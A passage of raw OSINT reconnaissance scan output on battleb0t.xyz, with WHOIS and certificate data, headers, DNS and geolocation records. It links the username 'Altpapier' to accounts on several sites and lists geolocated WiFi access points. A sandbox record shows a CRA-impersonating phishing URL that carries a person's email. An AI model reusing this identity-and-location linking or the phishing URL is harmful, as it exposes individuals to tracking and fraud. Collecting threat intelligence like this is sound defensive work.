d4:4d:c8:2a:c7:b7:82:2b:69:73:9f:f4:f6:c1:7d:a3:6f:02:
31:00:97:48:3c:2f:eb:bf:19:54:bc:8e:14:95:49:a7:05:bf:
e6:fa:13:41:2f:ff:2a:2b:4a:df:86:c2:17:9a:7a:15:fb:b9:
93:c8:cf:89:19:ce:5b:35:b7:4b:d3:57:36:16
| battleb0t.xyz |
| 2023-05-12 03:18:25 | Account on External Site | No | Account Finder | 0 | 0 | 5 | 0 | None | Reddit (Category: social)
https://www.reddit.com/user/Altpapier | Altpapier |
| 2023-05-12 03:31:32 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | abuse@dynadot.com | Domain Name: AYIU.XYZ
Registry Domain ID: D304640320-CNIC
Registrar WHOIS Server: whois.dynadot.com
Registrar URL: http://www.dynadot.com
Updated Date: 2022-06-28T04:15:13.0Z
Creation Date: 2022-06-23T04:11:38.0Z
Registry Expiry Date: 2023-06-23T23:59:59.0Z
Registrar: Dynadot LLC
Registrar IANA ID: 472
Domain Status: ok https://icann.org/epp#ok
Registrant Organization:
Registrant State/Province: California
Registrant Country: US
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: 170.NS1.ABOVE.COM
Name Server: 170.NS2.ABOVE.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@dynadot.com
Registrar Abuse Contact Phone: +1.6502620100
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:17:33.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain Name: AYIU.XYZ
Registry Domain ID: D304640320-CNIC
Registrar WHOIS Server: whois.dynadot.com
Registrar URL: http://www.dynadot.com
Updated Date: 2022-06-23T05:10:07.0Z
Creation Date: 2022-06-23T04:11:38.0Z
Registrar Registration Expiration Date: 2023-06-23T23:59:59.0Z
Registrar: DYNADOT LLC
Registrar IANA ID: 472
Registrar Abuse Contact Email: abuse@dynadot.com
Registrar Abuse Contact Phone: +1.6502620100
Registry Registrant ID: CPF-291635
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: Dynadot Privacy Service
Registrant Street: PO Box 701
Registrant Street:
Registrant City: San Mateo
Registrant State/Province: California
Registrant Postal Code: 94401
Registrant Country: US
Registrant Phone: +1.6505854708
Registrant Email: https://www.dynadot.com/domain/contact-request?domain=ayiu.xyz
Registry Admin ID: CPF-291635
Admin Name: REDACTED FOR PRIVACY
Admin Organization: Dynadot Privacy Service
Admin Street: PO Box 701
Admin Street:
Admin City: San Mateo
Admin State/Province: California
Admin Postal Code: 94401
Admin Country: US
Admin Phone: +1.6505854708
Admin Email: https://www.dynadot.com/domain/contact-request?domain=ayiu.xyz
Registry Tech ID: CPF-291635
Tech Name: REDACTED FOR PRIVACY
Tech Organization: Dynadot Privacy Service
Tech Street: PO Box 701
Tech Street:
Tech City: San Mateo
Tech State/Province: California
Tech Postal Code: 94401
Tech Country: US
Tech Phone: +1.6505854708
Tech Email: https://www.dynadot.com/domain/contact-request?domain=ayiu.xyz
Name Server: 170.ns1.above.com
Name Server: 170.ns2.above.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2022-06-22 22:10:07 -0700 <<<
|
| 2023-05-12 02:54:41 | HTTP Headers | No | Censys | 0 | 0 | 3 | 0 | None | {"Content_Length": ["0"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Nf_Request_Id": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8"}, "X_Nf_Request_Id": ["01H04595A0C45NR8DMSR5TCKG9"], "Date": ["<REDACTED>"], "Server": ["Netlify"]} | 104.196.30.220 |
| 2023-05-12 03:09:28 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | acilacikveteriner.com | 87.248.157.102 |
| 2023-05-12 03:33:34 | Raw File Meta Data | No | Binary String Extractor | 0 | 0 | 4 | 0 | None | !22222222222222222222222222222222222222222222222222
| https://pics.battleb0t.xyz/images/random_1.jpeg |
| 2023-05-12 02:51:33 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://this.props.pagesize/2)),e.currentdatapageendindex=math.min(e.currentdatapagestartindex+this.props.pagesize,this.props.rows.length-1),r=!0', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 26, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://89667lpjzo.thebassbite.com/fr-revenue-eservices-cra/index.php?=112726&redrisky%40icloud.com', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"SM0:6732:304:WilStaging_02"\n "InternetShortcutMutex"\n "Local\\SM0:6732:304:WilStaging_02"\n "SM0:6732:120:WilError_01"\n "Local\\SM0:6732:120:WilError_01"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"104.21.60.54:443"\n "138.91.254.96:443"\n "172.67.191.22:443"\n "142.251.46.195:443"\n "23.54.48.253:443"\n "198.103.206.14:443"\n "54.188.197.7:443"\n "142.251.46.163:443"\n "44.228.117.199:443"\n "44.233.87.152:443"\n "142.251.46.202:443"\n "152.199.4.33:443"\n "185.199.108.153:443"\n "23.39.0.132:443"\n "54.187.210.201:443"\n "63.140.36.119:443"\n "20.50.73.11:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': 
u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"89667lpjzo.thebassbite.com"\n "ajax.googleapis.com"\n "api.edgeoffer.microsoft.com"\n "assets.adobedtm.com"\n "c.go-mpulse.net"\n "canada.demdex.net"\n "canada.sc.omtrdc.net"\n "canada.tt.omtrdc.net"\n "cdn.botframework.com"\n "cm.everesttech.net"\n "cra-arc.gc.ca"\n "cra-taxation-benefits-revenue-e1service-645a781e0a6ac.wefishmedia.com"\n "design.canada.ca"\n "dpm.demdex.net"\n "fonts.gstatic.com"\n "self.events.data.microsoft.com"\n "wet-boew.github.io"\n "www.google.az"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string ""paypal.com"," (Indicator: "dir "; File: "wallet-checkout-eligible-sites-pre-stable.json")\n Found string ""baysidebuddy.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string ""comeherebuddy.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string ""www.facebook.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string ""linkedin.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")'}, {u'category': u'Unusual Characteristics', u'origin': u'File/Memory', u'identifier': u'string-23', u'name': u'Detected known bank URL artifact', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'""manitobaharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n ""highkey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""mandalascrubs.com"," 
(Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""primalharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n ""amazingclubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""purehockey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""order.firehousesubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""cousinssubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""digikey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""hockeymonkey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""4amscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""6whiskey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""99centsubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""allieandmickey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""alteregoscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""annabelbleu.com"," (Source: wallet-pre-stable.json, Indicator: "leu.com")\n ""aspirefashionscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""augustbleu.com"," (Source: wallet-pre-stable.json, Indicator: "leu.com")\n ""bananasmonkey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""baseballmonkey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-49', u'name': u'Drops ASP/PHP html files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': 
u'"urlref_https89667lpjzo.thebassbite.comfr-revenue-eservices-craindex.php_112726_redrisky%40icloud.com" has type "HTML document ASCII text with no line terminators"- [targetUID: N/A]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlref_https89667lpjzo.thebassbite.comfr-revenue-eservices-craindex.php_112726_redrisky%40icloud.com" has type "HTML document ASCII text with no line terminators"- [targetUID: N/A]\n "shopping.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\2300_214408614\\shopping.js]- [targetUID: 00000000-00002300]\n "data_2" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_2]- [targetUID: 00000000-00003868]\n "Ruleset Data" has type "data"- [targetUID: 00000000-00002300]\n "wallet-stable.json" has type "ASCII text"- Location: [%TEMP%\\2300_581733700\\json\\wallet\\wallet-stable.json]- [targetUID: 00000000-00002300]\n "wallet.bundle.js" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%TEMP%\\2300_581733700\\wallet.bundle.js]- [targetUID: 00000000-00002300]\n "Filtering Rules" has type "data"- Location: [%TEMP%\\2300_917696848\\Filtering Rules]- [targetUID: 00000000-00002300]\n "edge_driver.js" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%TEMP%\\2300_581733700\\edge_driver.js]- [targetUID: 00000000-00002300]\n "edge_driver.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\2300_214408614\\edge_driver.js]- [targetUID: 00000000-00002300]\n "vendor.bundle.js" has type "ASCII text with very long lines"- Location: 
[%TEMP%\\2300_581733700\\vendor.bundle.js]- [targetUID: 00000000-00002300]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_1]- [targetUID: 00000000-00003868]\n "4265444a-c4d4-4b4c-bbe4-9cd8a74a3d12.tmp" has type "gzip compressed data from FAT filesystem (MS-DOS OS/2 NT) original size modulo 2^32 148518"- Location: [%TEMP%\\4265444a-c4d4-4b4c-bbe4-9cd8a74a3d12.tmp]- [targetUID: 00000000-00002300]\n "wallet-drawer.bundle.js" has type "UTF-8 Unicode text with very long lines"- Location: [%TEMP%\\2300_581733700\\Wallet-Checkout\\wallet-drawer.bundle.js]- [targetUID: 00000000-00002300]\n "auto_open_controller.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\2300_214408614\\auto_open_controller.js]- [targetUID: 00000000-00002300]\n "f_0004d2" has type "gzip compressed data was "webchat-es5.js" last modified: Tue Jun 9 20:56:21 2020 max compression from Unix original size modulo 2^32 3055929"- [targetUID: N/A]\n "000009.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\EdgeCoupons\\coupons_data.db\\000009.log]- [targetUID: 00000000-00002300]\n "000013.ldb" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\EdgeCoupons\\coupons_data.db\\000013.ldb]- [targetUID: 00000000-00002300]\n "bnpl.bundle.js" has type "UTF-8 Unicode text with very long lines"- Location: [%TEMP%\\2300_581733700\\bnpl\\bnpl.bundle.js]- [targetUID: 00000000-00002300]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00002300]\n "tokenized-card.bundle.js" has type "UTF-8 Unicode text with very long lines"- Location: [%TEMP%\\2300_581733700\\Tokenized-Card\\tokenized-card.bundle.js]- [targetUID: 00000000-00002300]\n "edge_checkout_page_validator.js" has type "UTF-8 Unicode text with 
very long lines with CRLF line terminators"- Location: [%TEMP%\\2300_214408614\\edge_checkout_page_validator.js]- [targetUID: 00000000-00002300]\n "edge_confirmation_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\2300_214408614\\edge_confirmation_page_validator.js]- [targetUID: 00000000-00002300]\n "product_page.js" has type "UTF-8 Unicode text with very l | 185.199.108.153 |
| 2023-05-12 03:18:26 | Account on External Site | No | Account Finder | 0 | 0 | 5 | 0 | None | MCName (Minecraft) (Category: gaming)
https://mcname.info/en/search?q=Altpapier | Altpapier |
| 2023-05-12 03:27:00 | Linked URL - External | No | Web Server Identifier | 0 | 0 | 4 | 0 | None | http://127.0.0.1:* | {"cf-access-domain": "panel.battleb0t.xyz", "cf-ray": "7c5f606c5dec334e-EWR", "x-content-type-options": "nosniff", "content-security-policy": "frame-ancestors 'none'; connect-src 'self' http://127.0.0.1:*; default-src https: 'unsafe-inline'", "content-encoding": "gzip", "transfer-encoding": "chunked", "set-cookie": "CF_Session=nrj43fxpNUBlI2Utd; Path=/; Secure; Expires=Fri, 12 May 2023 06:54:22 GMT; HttpOnly; SameSite=none", "strict-transport-security": "max-age=31536000; includeSubDomains", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "x-xss-protection": "1; mode=block", "access-control-allow-credentials": "true", "date": "Fri, 12 May 2023 02:54:22 GMT", "access-control-allow-origin": "null", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "text/html", "x-frame-options": "DENY", "cf-version": "1432-d48eaba"} |
| 2023-05-12 02:54:13 | Open TCP Port | No | Censys | 0 | 0 | 4 | 0 | None | 2606:4700:3030::ac43:a8fc:443 | 2606:4700:3030::ac43:a8fc |
| 2023-05-12 03:00:26 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.6): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:09:41 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 126.48.229.35.bc.googleusercontent.com | 35.229.48.126 |
| 2023-05-12 03:03:17 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | ayhu.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
ff:0e:1e:a4:6f:55:f0:74:0e:b3:83:e1:07:c9:ea:93
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Google Trust Services LLC, CN=GTS CA 1P5
Validity
Not Before: Dec 14 04:12:07 2022 GMT
Not After : Mar 14 04:12:06 2023 GMT
Subject: CN=*.ayhu.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
FA:7E:08:50:07:6C:FD:DC:A8:68:45:A3:97:1C:E4:28:15:A8:2F:9D
X509v3 Authority Key Identifier:
keyid:D5:FC:9E:0D:DF:1E:CA:DD:08:97:97:6E:2B:C5:5F:C5:2B:F5:EC:B8
Authority Information Access:
OCSP - URI:http://ocsp.pki.goog/s/gts1p5/Yj_rNAxE9pQ
CA Issuers - URI:http://pki.goog/repo/certs/gts1p5.der
X509v3 Subject Alternative Name:
DNS:*.ayhu.xyz, DNS:ayhu.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.11129.2.5.3
X509v3 CRL Distribution Points:
Full Name:
URI:http://crls.pki.goog/gts1p5/ihFiAY-64YY.crl
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
|
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | S-lan (Net ID: 00:01:24:F1:91:41) | 37.780462,-122.390564 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | sflan50 (Net ID: 00:02:6F:32:A9:45) | 37.7642, -122.3993 |
| 2023-05-12 03:17:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | YouTube User (Category: video)
https://www.youtube.com/user/ayshoo/about | ayshoo |
| 2023-05-12 02:56:54 | Affiliate - Internet Name | No | DNS Resolver | 1 | 0 | 2 | 0 | None | cp.keyubu.net | 87.248.157.102 |
| 2023-05-12 03:09:40 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 117.48.229.35.bc.googleusercontent.com | 35.229.48.117 |
| 2023-05-12 03:24:50 | Country | No | Country Name Extractor | 0 | 0 | 5 | 0 | None | United States | Domain Name: 00RZ.COM
Registry Domain ID: 1545841665_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: http://www.godaddy.com
Updated Date: 2022-12-26T09:10:34Z
Creation Date: 2009-03-07T02:16:40Z
Registry Expiry Date: 2024-03-07T02:16:40Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: 480-624-2505
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Name Server: NS17.DOMAINCONTROL.COM
Name Server: NS18.DOMAINCONTROL.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T03:09:19Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: 00RZ.COM
Registry Domain ID: 1545841665_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: https://www.godaddy.com
Updated Date: 2022-12-26T04:10:32Z
Creation Date: 2009-03-06T21:16:40Z
Registrar Registration Expiration Date: 2024-03-06T21:16:40Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registry Registrant ID: Not Available From Registry
Registrant Name: Registration Private
Registrant Organization: Domains By Proxy, LLC
Registrant Street: DomainsByProxy.com
Registrant Street: 2155 E Warner Rd
Registrant City: Tempe
Registrant State/Province: Arizona
Registrant Postal Code: 85284
Registrant Country: US
Registrant Phone: +1.4806242599
Registrant Phone Ext:
Registrant Fax: +1.4806242598
Registrant Fax Ext:
Registrant Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=00RZ.COM
Registry Admin ID: Not Available From Registry
Admin Name: Registration Private
Admin Organization: Domains By Proxy, LLC
Admin Street: DomainsByProxy.com
Admin Street: 2155 E Warner Rd
Admin City: Tempe
Admin State/Province: Arizona
Admin Postal Code: 85284
Admin Country: US
Admin Phone: +1.4806242599
Admin Phone Ext:
Admin Fax: +1.4806242598
Admin Fax Ext:
Admin Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=00RZ.COM
Registry Tech ID: Not Available From Registry
Tech Name: Registration Private
Tech Organization: Domains By Proxy, LLC
Tech Street: DomainsByProxy.com
Tech Street: 2155 E Warner Rd
Tech City: Tempe
Tech State/Province: Arizona
Tech Postal Code: 85284
Tech Country: US
Tech Phone: +1.4806242599
Tech Phone Ext:
Tech Fax: +1.4806242598
Tech Fax Ext:
Tech Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=00RZ.COM
Name Server: NS17.DOMAINCONTROL.COM
Name Server: NS18.DOMAINCONTROL.COM
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T03:09:27Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
TERMS OF USE: The data contained in this registrar's Whois database, while believed by the
registrar to be reliable, is provided "as is" with no guarantee or warranties regarding its
accuracy. This information is provided for the sole purpose of assisting you in obtaining
information about domain name registration records. Any use of this data for any other purpose
is expressly forbidden without the prior written permission of this registrar. By submitting
an inquiry, you agree to these terms and limitations of warranty. In particular, you agree not
to use this data to allow, enable, or otherwise support the dissemination or collection of this
data, in part or in its entirety, for any purpose, such as transmission by e-mail, telephone,
postal mail, facsimile or other means of mass unsolicited, commercial advertising or solicitations
of any kind, including spam. You further agree not to use this data to enable high volume, automated
or robotic electronic processes designed to collect or compile this data for any purpose, including
mining this data for your own personal or commercial purposes. Failure to comply with these terms
may result in termination of access to the Whois database. These terms may be subject to modification
at any time without notice.
|
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | BJNPSETUP (Net ID: 00:00:85:F6:C3:DF) | 41.8781, -87.6298 |
| 2023-05-12 02:56:45 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:97:99:5c:60:ac:40:68:f8:b2:de:0a:67:7a:da:b7:d1:16
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Feb 24 03:02:53 2023 GMT
Not After : May 25 03:02:52 2023 GMT
Subject: CN=fluid.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
C4:85:82:A3:5E:ED:4D:54:E9:0D:BD:02:AC:67:B2:FA:F3:E1:58:3F
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:fluid.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
| battleb0t.xyz |
| 2023-05-12 02:45:24 | Raw Data from RIRs | No | ipapi.co | 0 | 0 | 3 | 0 | None | {u'region_code': u'HE', u'country_tld': u'.de', u'ip': u'64.226.81.43', u'currency_name': u'Euro', u'currency': u'EUR', u'country_population': 82927922, u'country_code': u'DE', u'timezone': u'Europe/Berlin', u'city': u'Frankfurt am Main', u'network': u'64.226.80.0/20', u'languages': u'de', u'version': u'IPv4', u'latitude': 50.113381, u'in_eu': True, u'utc_offset': u'+0200', u'continent_code': u'EU', u'country_name': u'Germany', u'country_capital': u'Berlin', u'org': u'DIGITALOCEAN-ASN', u'postal': u'60311', u'asn': u'AS14061', u'country': u'DE', u'region': u'Hesse', u'longitude': 8.671931, u'country_calling_code': u'+49', u'country_area': 357021.0, u'country_code_iso3': u'DEU'} | 64.226.81.43 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Steve (Net ID: 00:16:E3:41:0D:E8) | 40.2024, 29.0398 |
| 2023-05-12 02:48:19 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:50:55:6d:e5:64:92:a0:7f:d0:de:03:2b:af:77:c2:fc:fe
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: May 4 19:22:49 2023 GMT
Not After : Aug 2 19:22:48 2023 GMT
Subject: CN=nwapi2.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
CB:34:4D:A2:38:84:54:47:A0:B5:F7:DD:3C:83:22:CF:57:4A:1C:21
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:nwapi2.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
